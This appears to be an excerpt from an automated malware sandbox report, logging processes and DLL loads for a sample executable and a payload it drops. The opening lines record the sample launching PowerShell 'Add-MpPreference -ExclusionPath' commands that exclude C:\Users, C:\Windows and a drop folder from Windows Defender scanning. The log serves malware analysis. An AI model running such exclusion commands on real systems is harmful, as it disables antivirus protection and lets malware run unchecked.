Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows	Jump to behavior

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: apphelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: sspicli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: wininet.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: rstrtmgr.dll
